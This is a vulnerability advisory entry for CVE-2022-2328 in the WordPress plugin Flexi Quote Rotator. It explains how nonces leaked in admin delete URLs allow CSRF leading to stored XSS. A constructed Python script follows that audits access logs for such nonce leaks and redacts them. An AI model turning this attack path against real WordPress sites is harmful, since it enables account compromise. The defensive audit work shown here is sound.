CVE: CVE-2022-2328
Name: Flexi Quote Rotator (flexi-quote-rotator)
Version: 0.9.4
Date: 2022-04-17 18:54:38
Advisory: https://wpscan.com/vulnerability/dbac391b-fc48-4e5e-b63a-2b3ddb0d5552
Type: Stored XSS
Exploit: Leaked nonces, for example in delete links (which end up in the browser history) such as https://example.com/wp-admin/edit.php?page=flexi-quote-rotator.php&action=delete-quote&id=2&_wpnonce=087aa96cbb, can be used for CSRF, which leads to Stored XSS. This is probably the same for other URLs, since the standard _wpnonce name is used.
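
Added example (not from the advisory or the plugin): a log audit that flags GET requests to wp-admin carrying `_wpnonce` in the query string, which is the leak path described above, and redacts the nonce value before the finding is stored. The state-changing action prefixes and the sample log lines are constructed assumptions; only `delete-quote` and `_wpnonce` come from the advisory.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

NONCE_PARAM = "_wpnonce"  # parameter name given in the advisory
# Assumption: action prefixes treated as state-changing; the advisory names only delete-quote.
STATE_CHANGING_PREFIXES = ("delete", "add", "edit", "update", "save")


def audit_url(url):
    """Return (finding, redacted_url); finding is None if no admin nonce is in the URL."""
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    params = dict(query)
    if NONCE_PARAM not in params or "/wp-admin/" not in parts.path:
        return None, url
    action = params.get("action", "")
    finding = {
        "page": params.get("page", ""),
        "action": action,
        # A nonce on a state-changing GET link is the case the advisory describes.
        "severity": "high" if action.startswith(STATE_CHANGING_PREFIXES) else "info",
    }
    redacted = [(k, "REDACTED" if k == NONCE_PARAM else v) for k, v in query]
    return finding, urlunsplit(parts._replace(query=urlencode(redacted)))


def audit_access_log(lines):
    """Scan combined-format access log lines for GET requests exposing a nonce."""
    findings = []
    for line in lines:
        try:
            method, target, _proto = line.split('"')[1].split(" ", 2)
        except (IndexError, ValueError):
            continue  # skip malformed lines
        finding, redacted = audit_url(target) if method == "GET" else (None, target)
        if finding:
            findings.append({**finding, "redacted": redacted})
    return findings


# Constructed sample log lines (addresses, nonce value and sizes are made up).
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Apr/2022:18:54:38 +0000] "GET /wp-admin/edit.php?page=flexi-quote-rotator.php&action=delete-quote&id=2&_wpnonce=0000000000 HTTP/1.1" 302 0',
    '203.0.113.5 - - [17/Apr/2022:18:55:01 +0000] "GET /wp-admin/edit.php?page=flexi-quote-rotator.php HTTP/1.1" 200 5120',
    '203.0.113.5 - - [17/Apr/2022:18:55:09 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for f in audit_access_log(SAMPLE_LOG):
        print(f["severity"], f["action"], f["redacted"])
```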